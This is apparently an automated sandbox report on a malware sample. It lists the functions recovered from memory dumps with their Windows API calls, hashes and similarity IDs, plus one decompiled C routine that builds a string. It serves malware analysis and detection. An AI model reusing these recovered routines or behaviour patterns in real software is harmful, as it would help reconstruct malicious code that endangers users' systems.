                              • Opcode Fuzzy Hash: f78999b2cc8e9b7dcb09c79d7ee97552ad2d28085e21c0e01b86b5dd44709c28
                              • Instruction Fuzzy Hash: 44415E75D0022AEFEF219FA8CD85BDEBBB9AB0A740F104096F691A2150D7758A44CF90
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 01026A4D, Relevance: 10.6, APIs: 7, Instructions: 123registrymemoryCOMMON
                              Download Yara Rule
                              APIs
                              • RtlImageNtHeader.NTDLL ref: 01026A76
                              • RtlEnterCriticalSection.NTDLL(00000000), ref: 01026AB9
                              • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 01026AD4
                              • CloseHandle.KERNEL32(?,?,?,00000000,?,?,?), ref: 01026B2A
                              • HeapFree.KERNEL32(00000000,?,?,00000000,00000000,?,?,?), ref: 01026B85
                              • RegCloseKey.ADVAPI32(?,?,?,00000000,?,?,?), ref: 01026B93
                              • RtlLeaveCriticalSection.NTDLL(00000000), ref: 01026B9E
                                • Part of subcall function 010274C2: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 010274D6
                                • Part of subcall function 010274C2: memcpy.NTDLL(00000000,00000000,?,?,00000000,?,0102C607,00000000,00000000,00000001,?,01042FAF,00000020,00000000,?,00000000), ref: 010274FF
                                • Part of subcall function 010274C2: RegCloseKey.ADVAPI32(?,?,0102C607,00000000,00000000,00000001,?,01042FAF,00000020,00000000,?,00000000,?,00000000), ref: 01027553
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: Close$CriticalSection$CreateEnterFreeHandleHeaderHeapImageLeaveOpenmemcpy
                              • String ID:
                              • API String ID: 2070110485-0
                              • Opcode ID: ea0e9002a7458b5dc3f6298360cecb3576036ddb52c9c0c20e6f3157b2f3b659
                              • Instruction ID: acfaab000f9371951aa226998334ce1f213186425be522077eb1112daff608bf
                              • Opcode Fuzzy Hash: ea0e9002a7458b5dc3f6298360cecb3576036ddb52c9c0c20e6f3157b2f3b659
                              • Instruction Fuzzy Hash: DD416C76200216EFEB229F69D988FAB3BA9EB44741F0440A4FE85DB154DB76D940CB90
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 01044420, Relevance: 10.6, APIs: 7, Instructions: 109memoryfileCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0103D619: GetTempPathA.KERNEL32(00000000,00000000,00000000,00000000,74785520,?,?,?,01042F93,00000000,?,00000000,010243B5), ref: 0103D62B
                                • Part of subcall function 0103D619: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,01042F93,00000000,?,00000000,010243B5), ref: 0103D644
                                • Part of subcall function 0103D619: GetCurrentThreadId.KERNEL32 ref: 0103D651
                                • Part of subcall function 0103D619: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,01042F93,00000000,?,00000000,010243B5,?,?,?,?,?,010243B5,00000000), ref: 0103D65D
                                • Part of subcall function 0103D619: GetTempFileNameA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,01042F93,00000000,?,00000000,010243B5), ref: 0103D66B
                                • Part of subcall function 0103D619: lstrcpy.KERNEL32(00000000), ref: 0103D68D
                              • StrChrA.SHLWAPI(?,0000002C,00003219), ref: 0104446A
                              • StrTrimA.SHLWAPI(?,?), ref: 0104448D
                              • StrTrimA.SHLWAPI(?,?,?,?,00000001), ref: 010444F6
                              • HeapFree.KERNEL32(00000000,00000000,?,?,00000001), ref: 01044519
                              • DeleteFileA.KERNEL32(?,00003219), ref: 01044542
                              • HeapFree.KERNEL32(00000000,?), ref: 01044554
                              • HeapFree.KERNEL32(00000000,?,00003219), ref: 01044565
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: FileFreeHeapTemp$PathTimeTrim$CurrentDeleteNameSystemThreadlstrcpy
                              • String ID:
                              • API String ID: 1078934163-0
                              • Opcode ID: 43fc631f365500760aa0ecbd0b2a58ff4feb5cc83c1a2536c7c877d378c4a975
                              • Instruction ID: f4a133181fca48f85e3dc330fe6f6ec84fc1b69ccf00313f5de33c06200510ef
                              • Opcode Fuzzy Hash: 43fc631f365500760aa0ecbd0b2a58ff4feb5cc83c1a2536c7c877d378c4a975
                              • Instruction Fuzzy Hash: DF419DB1204306AFE721DF18DD84F5B7BE8AB88744F040469F6C4D7095DB76D909CBA2
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 01030BBF, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 103memoryCOMMON
                              Download Yara Rule
                              APIs
                              • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 01030BD9
                              • RtlAllocateHeap.NTDLL(00000000,00000024), ref: 01030BEE
                              • memset.NTDLL ref: 01030BFB
                              • HeapFree.KERNEL32(00000000,00000000,?,01037329,0104FAE0,?,?,010501F4), ref: 01030C18
                              • memcpy.NTDLL(?,010501F4,?,?,01037329,0104FAE0,?,?,010501F4), ref: 01030C39
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: Heap$Allocate$Freememcpymemset
                              • String ID: chun
                              • API String ID: 2362494589-3058818181
                              • Opcode ID: 22577810c90c5f2a61d89a8522944becc0147d5e50475aa0bb9c2284977a1175
                              • Instruction ID: 92e5aba4df8f8eb749e21bc5ad5bd5bc8e416d5212e32f93996429c74e72f1a8
                              • Opcode Fuzzy Hash: 22577810c90c5f2a61d89a8522944becc0147d5e50475aa0bb9c2284977a1175
                              • Instruction Fuzzy Hash: 4A31897550170AAFE730CF59C884A5BBBECEF44310F00482AF99ACB664D771E905CB90
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0103F482, Relevance: 10.6, APIs: 7, Instructions: 83stringfileCOMMON
                              Download Yara Rule
                              APIs
                              • RtlEnterCriticalSection.NTDLL(00000000), ref: 0103F498
                              • lstrcmpiW.KERNEL32(00000000,?), ref: 0103F4D0
                              • lstrcmpiW.KERNEL32(?,?), ref: 0103F4E5
                              • lstrlenW.KERNEL32(?), ref: 0103F4EC
                              • CloseHandle.KERNEL32(?), ref: 0103F514
                              • DeleteFileW.KERNEL32(?,?,?,?,?,?), ref: 0103F540
                              • RtlLeaveCriticalSection.NTDLL(00000000), ref: 0103F55E
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: CriticalSectionlstrcmpi$CloseDeleteEnterFileHandleLeavelstrlen
                              • String ID:
                              • API String ID: 1496873005-0
                              • Opcode ID: da43e392da724db24163ef6608814515f25d9f11d4118c39e593434cc72cd997
                              • Instruction ID: 2be535852ede14db9d4246b8e17305c77e6643fd68ab0d03403e14bfdfae7d5f
                              • Opcode Fuzzy Hash: da43e392da724db24163ef6608814515f25d9f11d4118c39e593434cc72cd997
                              • Instruction Fuzzy Hash: 252146B2A00206EBDB209F69DD84EAB7BFCBF45340B000564F686D2155EB35EA458B61
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 01029018, Relevance: 10.6, APIs: 7, Instructions: 76memorystringCOMMON
                              Download Yara Rule
                              APIs
                              • lstrlen.KERNEL32(010256DD,00000000,01050480,010504A0,?,?,010256DD,0102F5DF,01050480), ref: 01029028
                              • RtlAllocateHeap.NTDLL(00000000,00000002), ref: 0102903E
                              • lstrlen.KERNEL32(0102F5DF,?,?,010256DD,0102F5DF,01050480), ref: 01029046
                              • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 01029052
                              • lstrcpy.KERNEL32(01050480,010256DD), ref: 01029068
                              • HeapFree.KERNEL32(00000000,00000000,?,?,010256DD,0102F5DF,01050480), ref: 010290BC
                              • HeapFree.KERNEL32(00000000,01050480,?,?,010256DD,0102F5DF,01050480), ref: 010290CB
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: Heap$AllocateFreelstrlen$lstrcpy
                              • String ID:
                              • API String ID: 1531811622-0
                              • Opcode ID: 14754753680ad17598477b16a1c7e74f221e3acaa3e5892d572ad4c46453b1e5
                              • Instruction ID: 8d62eaf8448f875a5b1c70e708a536f4db5b4f135fa11cba755c518af223ef11
                              • Opcode Fuzzy Hash: 14754753680ad17598477b16a1c7e74f221e3acaa3e5892d572ad4c46453b1e5
                              • Instruction Fuzzy Hash: 4421F235200358AFEB724F68DD84F6A7FAAEB86748F144099F9C557215C73B9C06C760
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 010431EF, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75stringCOMMON
                              Download Yara Rule
                              APIs
                              • lstrlenW.KERNEL32(00000000,00000000,?,?,00000000,?,010246AF,00000000), ref: 01043213
                                • Part of subcall function 01041FD9: lstrcpy.KERNEL32(-000000FC,00000000), ref: 01042013
                                • Part of subcall function 01041FD9: CreateDirectoryA.KERNEL32(00000000,00000000,?,00002365,00000000,?,01043220,?,?,00000000,?,010246AF,00000000), ref: 01042025
                                • Part of subcall function 01041FD9: GetTickCount.KERNEL32 ref: 01042030
                                • Part of subcall function 01041FD9: GetTempFileNameA.KERNEL32(00000000,00000000,00000000,?,00002365,00000000,?,01043220,?,?,00000000,?,010246AF,00000000), ref: 0104203C
                                • Part of subcall function 01041FD9: lstrcpy.KERNEL32(00000000), ref: 01042056
                                • Part of subcall function 0103032D: RtlAllocateHeap.NTDLL(00000000,?,010424D0), ref: 01030339
                              • lstrcpy.KERNEL32(00000000), ref: 0104324E
                              • wsprintfA.USER32 ref: 01043261
                              • GetTickCount.KERNEL32 ref: 01043276
                              • wsprintfA.USER32 ref: 0104328B
                                • Part of subcall function 010469F0: RtlFreeHeap.NTDLL(00000000,?,010262C2,00000000), ref: 010469FC
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: lstrcpy$CountHeapTickwsprintf$AllocateCreateDirectoryFileFreeNameTemplstrlen
                              • String ID: "%S"
                              • API String ID: 1152860224-1359967185
                              • Opcode ID: 31edf60b52dfc52be42f91efa00747d031fbbc6bbcc3903ebc689518ef2381a7
                              • Instruction ID: c621772789effd0f9ec00da633a32ad2fdefad4841d35915326c1a2d1f43816c
                              • Opcode Fuzzy Hash: 31edf60b52dfc52be42f91efa00747d031fbbc6bbcc3903ebc689518ef2381a7
                              • Instruction Fuzzy Hash: 1F11A2F6501226BBD3207B689D88EAF7B9CEF95250B054425FAC597101DA79980087B1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 01021000, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75fileCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0102F001: GetSystemTimeAsFileTime.KERNEL32(?), ref: 0102F00D
                                • Part of subcall function 0102F001: _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 0102F023
                                • Part of subcall function 0102F001: _snwprintf.NTDLL ref: 0102F048
                                • Part of subcall function 0102F001: CreateFileMappingW.KERNEL32(000000FF,01050244,00000004,00000000,00001000,?), ref: 0102F064
                                • Part of subcall function 0102F001: GetLastError.KERNEL32 ref: 0102F076
                                • Part of subcall function 0102F001: CloseHandle.KERNEL32(00000000), ref: 0102F0AE
                              • UnmapViewOfFile.KERNEL32(?,?,?), ref: 0102103B
                              • CloseHandle.KERNEL32(?), ref: 01021044
                              • SetEvent.KERNEL32(?,?,?), ref: 0102108B
                              • GetLastError.KERNEL32(01041BD5,00000000,00000000), ref: 010210BA
                              • CloseHandle.KERNEL32(00000000,01041BD5,00000000,00000000), ref: 010210CA
                                • Part of subcall function 010347C6: lstrlenW.KERNEL32(80000001,761506E0,01048A01,80000001,?,?,0102360B,?), ref: 010347D2
                                • Part of subcall function 010347C6: memcpy.NTDLL(00000000,00000002,00000000,00000002,?,?,0102360B,?), ref: 010347FA
                                • Part of subcall function 010347C6: memset.NTDLL ref: 0103480C
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: CloseFileHandle$ErrorLastTime$CreateEventMappingSystemUnmapView_aulldiv_snwprintflstrlenmemcpymemset
                              • String ID: is p
                              • API String ID: 1106445334-4099728386
                              • Opcode ID: b25b4e7059cbc2c1320fa6f0c63846b76c7c4f9d980bc277ee3eab3f51284181
                              • Instruction ID: cad732b61ae8c76b3e86beb0aaf7ed445fe7cc7158537ec7bbb0ea3fb49b17ae
                              • Opcode Fuzzy Hash: b25b4e7059cbc2c1320fa6f0c63846b76c7c4f9d980bc277ee3eab3f51284181
                              • Instruction Fuzzy Hash: 5721C575740315AFD761AF78DD84B5F7BE8AB40320B010568FAC1D3154EBBAE8008BA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 01044DBB, Relevance: 10.6, APIs: 7, Instructions: 71filememoryCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0103D619: GetTempPathA.KERNEL32(00000000,00000000,00000000,00000000,74785520,?,?,?,01042F93,00000000,?,00000000,010243B5), ref: 0103D62B
                                • Part of subcall function 0103D619: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,01042F93,00000000,?,00000000,010243B5), ref: 0103D644
                                • Part of subcall function 0103D619: GetCurrentThreadId.KERNEL32 ref: 0103D651
                                • Part of subcall function 0103D619: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,01042F93,00000000,?,00000000,010243B5,?,?,?,?,?,010243B5,00000000), ref: 0103D65D
                                • Part of subcall function 0103D619: GetTempFileNameA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,01042F93,00000000,?,00000000,010243B5), ref: 0103D66B
                                • Part of subcall function 0103D619: lstrcpy.KERNEL32(00000000), ref: 0103D68D
                              • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,00001ED2,00000000,000000B7,?,00000001,0102548D,00000000,00000000,00000011), ref: 01044DFC
                              • HeapFree.KERNEL32(00000000,00000000,00001ED2,00000000,000000B7,?,00000001,0102548D,00000000,00000000,00000011), ref: 01044E6F
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: FileTemp$PathTime$CreateCurrentFreeHeapNameSystemThreadlstrcpy
                              • String ID:
                              • API String ID: 2078930461-0
                              • Opcode ID: 629bfa7ab81fd9f64055ca901ac45e2b00d2676133d2d7f55f676c3c0ef7b525
                              • Instruction ID: 78e07250c4ccb4efe7f5ca196ce865dc94edcd360dfef1e52a1451ecf2d9b7ec
                              • Opcode Fuzzy Hash: 629bfa7ab81fd9f64055ca901ac45e2b00d2676133d2d7f55f676c3c0ef7b525
                              • Instruction Fuzzy Hash: 991127B5284314FBD3322A65ACCCF6F3F9DEB447A0F000121F6C2D6095D66B4814C7A0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 01030B0F, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 68stringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 01043EEB: lstrlen.KERNEL32(00000000,00000000,770CC740,74785520,?,?,?,01030B29,?,00000000,770CC740,74785520,?,?,0103F27A), ref: 01043F52
                                • Part of subcall function 01043EEB: sprintf.NTDLL ref: 01043F73
                              • lstrlen.KERNEL32(00000000,?,00000000,770CC740,74785520,?,?,0103F27A,?,04B3C0E0), ref: 01030B3A
                              • lstrlen.KERNEL32(?,?,?,0103F27A,?,04B3C0E0), ref: 01030B42
                                • Part of subcall function 0103032D: RtlAllocateHeap.NTDLL(00000000,?,010424D0), ref: 01030339
                              • strcpy.NTDLL ref: 01030B59
                              • lstrcat.KERNEL32(00000000,?), ref: 01030B64
                                • Part of subcall function 01045461: lstrlen.KERNEL32(?,?,0103F27A,0103F27A,00000001,00000000,00000000,?,01030B73,00000000,0103F27A,?,?,0103F27A,?,04B3C0E0), ref: 01045478
                                • Part of subcall function 010469F0: RtlFreeHeap.NTDLL(00000000,?,010262C2,00000000), ref: 010469FC
                              • StrTrimA.SHLWAPI(00000000,=,00000000,00000000,0103F27A,?,?,0103F27A,?,04B3C0E0), ref: 01030B81
                                • Part of subcall function 0103D7A9: lstrlen.KERNEL32(?,00000000,00000000,00000000,?,01030B8D,00000000,?,?,0103F27A,?,04B3C0E0), ref: 0103D7B3
                                • Part of subcall function 0103D7A9: _snprintf.NTDLL ref: 0103D811
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: lstrlen$Heap$AllocateFreeTrim_snprintflstrcatsprintfstrcpy
                              • String ID: =
                              • API String ID: 2864389247-1428090586
                              • Opcode ID: 7b7f3dddf052aa5c8ea763f49d74fe8874adafe5b5353ca1df8c004dc4908ec8
                              • Instruction ID: ba60cb335c4991649a03650331c2b48a18f9dc87316a3ad562ad313bb91a0b79
                              • Opcode Fuzzy Hash: 7b7f3dddf052aa5c8ea763f49d74fe8874adafe5b5353ca1df8c004dc4908ec8
                              • Instruction Fuzzy Hash: 2E11E3B76022267B9B227BA89CC4CEF3AAC9EC56543050075FAC0DB204DE7ADC0183E0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 013EA7FB, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 68stringCOMMON
                              Download Yara Rule
                              C-Code - Quality: 64%
                              			E013EA7FB(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _t9;
				intOrPtr _t13;
				char* _t28;
				void* _t33;
				void* _t34;
				char* _t36;
				intOrPtr* _t40;
				char* _t41;
				char* _t42;
				char* _t43;

				_t34 = __edx;
				_push(__ecx);
				_t9 =  *0x13ed2b8; // 0x26ea5a8
				_t1 = _t9 + 0x13ee62c; // 0x253d7325
				_t36 = 0;
				_t28 = E013E2262(__ecx, _t1);
				if(_t28 != 0) {
					_t40 = __imp__;
					_t13 =  *_t40(_t28);
					_v8 = _t13;
					_t6 =  *_t40(_a4) + 1; // 0x3ad95b1
					_t41 = E013E55DC(_v8 + _t6);
					if(_t41 != 0) {
						strcpy(_t41, _t28);
						_pop(_t33);
						__imp__(_t41, _a4);
						_t36 = E013E66FF(_t34, _t41, _a8);
						E013E6DFA(_t41);
						_t42 = E013E4024(StrTrimA(_t36, "="), _t36);
						if(_t42 != 0) {
							E013E6DFA(_t36);
							_t36 = _t42;
						}
						_t43 = E013E484D(_t36, _t33);
						if(_t43 != 0) {
							E013E6DFA(_t36);
							_t36 = _t43;
						}
					}
					E013E6DFA(_t28);
				}
				return _t36;
			}














                              0x013ea7fb
                              0x013ea7fe
                              0x013ea7ff
                              0x013ea807
                              0x013ea80e
                              0x013ea815
                              0x013ea819
                              0x013ea81f
                              0x013ea826
                              0x013ea82b
                              0x013ea833
                              0x013ea83d
                              0x013ea841
                              0x013ea845
                              0x013ea84b
                              0x013ea850
                              0x013ea860
                              0x013ea862
                              0x013ea879
                              0x013ea87d
                              0x013ea880
                              0x013ea885
                              0x013ea885
                              0x013ea88e
                              0x013ea892
                              0x013ea895
                              0x013ea89a
                              0x013ea89a
                              0x013ea892
                              0x013ea89d
                              0x013ea89d
                              0x013ea8a8

                              APIs
                                • Part of subcall function 013E2262: lstrlen.KERNEL32(00000000,00000000,00000000,?,?,?,?,013EA815,253D7325,00000000,00000000,?,?,74785520,013E64DC), ref: 013E22C9
                                • Part of subcall function 013E2262: sprintf.NTDLL ref: 013E22EA
                              • lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,?,?,74785520,013E64DC,?,03AD95B0), ref: 013EA826
                              • lstrlen.KERNEL32(?,?,74785520,013E64DC,?,03AD95B0), ref: 013EA82E
                                • Part of subcall function 013E55DC: RtlAllocateHeap.NTDLL(00000000,00000000,013E552C), ref: 013E55E8
                              • strcpy.NTDLL ref: 013EA845
                              • lstrcat.KERNEL32(00000000,?), ref: 013EA850
                                • Part of subcall function 013E66FF: lstrlen.KERNEL32(?,?,013E64DC,013E64DC,00000001,00000000,00000000,?,013EA85F,00000000,013E64DC,?,74785520,013E64DC,?,03AD95B0), ref: 013E6716
                                • Part of subcall function 013E6DFA: RtlFreeHeap.NTDLL(00000000,00000000,013E55CD,00000000,?,?,00000000), ref: 013E6E06
                              • StrTrimA.SHLWAPI(00000000,=,00000000,00000000,013E64DC,?,74785520,013E64DC,?,03AD95B0), ref: 013EA86D
                                • Part of subcall function 013E4024: lstrlen.KERNEL32(?,00000000,00000000,00000000,?,013EA879,00000000,?,74785520,013E64DC,?,03AD95B0), ref: 013E402E
                                • Part of subcall function 013E4024: _snprintf.NTDLL ref: 013E408C
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.655495954.00000000013E1000.00000020.00020000.sdmp, Offset: 013E0000, based on PE: true
                              • Associated: 00000000.00000002.655418004.00000000013E0000.00000004.00020000.sdmp Download File
                              • Associated: 00000000.00000002.655701530.00000000013EC000.00000002.00020000.sdmp Download File
                              • Associated: 00000000.00000002.655806217.00000000013ED000.00000004.00020000.sdmp Download File
                              • Associated: 00000000.00000002.655861835.00000000013EF000.00000002.00020000.sdmp Download File
                              Similarity
                              • API ID: lstrlen$Heap$AllocateFreeTrim_snprintflstrcatsprintfstrcpy
                              • String ID: =
                              • API String ID: 2864389247-1428090586
                              • Opcode ID: 4b2d23052f3df2015a2d1074031b7a546fb4fd1fe4123aaa04d73e32f8cbfb39
                              • Instruction ID: 9adb0c6d48a4e4febb8f454ce675734ede66568064512199a549408fd0c1ad8f
                              • Opcode Fuzzy Hash: 4b2d23052f3df2015a2d1074031b7a546fb4fd1fe4123aaa04d73e32f8cbfb39
                              • Instruction Fuzzy Hash: 3011CA77501336A7C62277BD9C5CCAF3FED9E6566C7094125F605AB280DE35DC0247A0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 01025D8B, Relevance: 10.6, APIs: 7, Instructions: 67threadCOMMON
                              Download Yara Rule
                              APIs
                              • SwitchToThread.KERNEL32(?,?,01042516), ref: 01025DB6
                              • CloseHandle.KERNEL32(?,?,01042516), ref: 01025DC2
                              • CloseHandle.KERNEL32(00000000,747DF720,?,01042320,00000000,?,?,?,01042516), ref: 01025DD4
                              • memset.NTDLL ref: 01025DEB
                              • memset.NTDLL ref: 01025E02
                              • memset.NTDLL ref: 01025E19
                              • memset.NTDLL ref: 01025E30
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: memset$CloseHandle$SwitchThread
                              • String ID:
                              • API String ID: 3699883640-0
                              • Opcode ID: 06710d2b3aa64fefbdb651742cebc1a8665ebe810c46f0e930fd419bdb49d711
                              • Instruction ID: a7da55542c522351beb938872967466cf0b30713479e583c0eb5013bb28f76c3
                              • Opcode Fuzzy Hash: 06710d2b3aa64fefbdb651742cebc1a8665ebe810c46f0e930fd419bdb49d711
                              • Instruction Fuzzy Hash: 7911C4B1981235B7D77137299C48DCF3A6CAFE1700F144025F5C8A710EE76A490187A9
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 010328ED, Relevance: 10.6, APIs: 7, Instructions: 62memorysynchronizationCOMMON
                              Download Yara Rule
                              APIs
                              • RtlAllocateHeap.NTDLL(00000000,?), ref: 0103291E
                              • wcstombs.NTDLL ref: 0103292F
                                • Part of subcall function 0102881B: StrChrA.SHLWAPI(?,0000002E,00000000,?,?,00000000,01023177,00000000,?,00000000,?,?,?,?,?,?), ref: 0102882D
                                • Part of subcall function 0102881B: StrChrA.SHLWAPI(?,00000020,?,00000000,01023177,00000000,?,00000000,?,?,?,?,?,?), ref: 0102883C
                              • OpenProcess.KERNEL32(00000001,00000000,?,00000000), ref: 01032950
                              • TerminateProcess.KERNEL32(00000000,00000000), ref: 0103295F
                              • CloseHandle.KERNEL32(00000000), ref: 01032966
                              • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 01032975
                              • WaitForSingleObject.KERNEL32(00000000), ref: 01032985
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: HeapProcess$AllocateCloseFreeHandleObjectOpenSingleTerminateWaitwcstombs
                              • String ID:
                              • API String ID: 417118235-0
                              • Opcode ID: 530388f8c9b60844101e76b41511b764241a59e6449f0aa42b84976f450b030c
                              • Instruction ID: 9dc6db3a7c4ca52141746713d75b3cf9c0f9e3c8294e9c79a18c470e1ed26333
                              • Opcode Fuzzy Hash: 530388f8c9b60844101e76b41511b764241a59e6449f0aa42b84976f450b030c
                              • Instruction Fuzzy Hash: 04110175200216FBE7705B58DE88FAE7FADFF00791F000011FA86A6194C7BAD854CBA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 01041FD9, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 59stringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0103D619: GetTempPathA.KERNEL32(00000000,00000000,00000000,00000000,74785520,?,?,?,01042F93,00000000,?,00000000,010243B5), ref: 0103D62B
                                • Part of subcall function 0103D619: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,01042F93,00000000,?,00000000,010243B5), ref: 0103D644
                                • Part of subcall function 0103D619: GetCurrentThreadId.KERNEL32 ref: 0103D651
                                • Part of subcall function 0103D619: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,01042F93,00000000,?,00000000,010243B5,?,?,?,?,?,010243B5,00000000), ref: 0103D65D
                                • Part of subcall function 0103D619: GetTempFileNameA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,01042F93,00000000,?,00000000,010243B5), ref: 0103D66B
                                • Part of subcall function 0103D619: lstrcpy.KERNEL32(00000000), ref: 0103D68D
                              • lstrcpy.KERNEL32(-000000FC,00000000), ref: 01042013
                              • CreateDirectoryA.KERNEL32(00000000,00000000,?,00002365,00000000,?,01043220,?,?,00000000,?,010246AF,00000000), ref: 01042025
                              • GetTickCount.KERNEL32 ref: 01042030
                              • GetTempFileNameA.KERNEL32(00000000,00000000,00000000,?,00002365,00000000,?,01043220,?,?,00000000,?,010246AF,00000000), ref: 0104203C
                              • lstrcpy.KERNEL32(00000000), ref: 01042056
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: Temp$Filelstrcpy$NamePathTime$CountCreateCurrentDirectorySystemThreadTick
                              • String ID: \Low
                              • API String ID: 1629304206-4112222293
                              • Opcode ID: 159eac05c0a08c371372e55230635af79c2ed82fcabe2d29929f13b8f974496c
                              • Instruction ID: 2e6bac8571b84be42ef31e6d82bd618718167175f10e2400e46bf40ebe419b52
                              • Opcode Fuzzy Hash: 159eac05c0a08c371372e55230635af79c2ed82fcabe2d29929f13b8f974496c
                              • Instruction Fuzzy Hash: 1001D2B1301615ABE3316A79ADC8FAB7BDCEF05741B010075F691D7046DB2AD901C7B5
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0103D8F9, Relevance: 10.6, APIs: 7, Instructions: 57memoryregistrystringCOMMON
                              Download Yara Rule
                              APIs
                              • lstrlen.KERNEL32(0102F5DF,00000000,00000000,010504A0,?,?,010256EC,0102F5DF,00000000,0102F5DF,01050480), ref: 0103D90C
                              • RtlAllocateHeap.NTDLL(00000000,-00000005), ref: 0103D91A
                              • wsprintfA.USER32 ref: 0103D936
                              • RegCreateKeyA.ADVAPI32(80000001,01050480,00000000), ref: 0103D94E
                              • lstrlen.KERNEL32(?), ref: 0103D95D
                              • RegCloseKey.ADVAPI32(?), ref: 0103D976
                              • HeapFree.KERNEL32(00000000,00000000), ref: 0103D985
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: Heaplstrlen$AllocateCloseCreateFreewsprintf
                              • String ID:
                              • API String ID: 3908752696-0
                              • Opcode ID: 651ebbc6df17aea18badfe3a5084d376286e05b569bb50ce33e7004b0713f36a
                              • Instruction ID: 2c89815649bf5229ee000cfe68cee1767b735f628e3f54ca99073ca56f9f0ca5
                              • Opcode Fuzzy Hash: 651ebbc6df17aea18badfe3a5084d376286e05b569bb50ce33e7004b0713f36a
                              • Instruction Fuzzy Hash: 0D118EBA200209FFEB215B98ED88EAB3B7EEB45304F004025FA81D6164DA779D14DB50
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0102B029, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 45timeCOMMON
                              Download Yara Rule
                              APIs
                              • wsprintfA.USER32 ref: 0102B03C
                              • CreateWaitableTimerA.KERNEL32(00000000,00000001,?), ref: 0102B04E
                              • SetWaitableTimer.KERNEL32(00000000,?,00000000,00000000,00000000,00000000), ref: 0102B078
                              • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 0102B08B
                              • CloseHandle.KERNEL32(?), ref: 0102B094
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: TimerWaitable$CloseCreateHandleMultipleObjectsWaitwsprintf
                              • String ID: 0x%08X
                              • API String ID: 603522830-3182613153
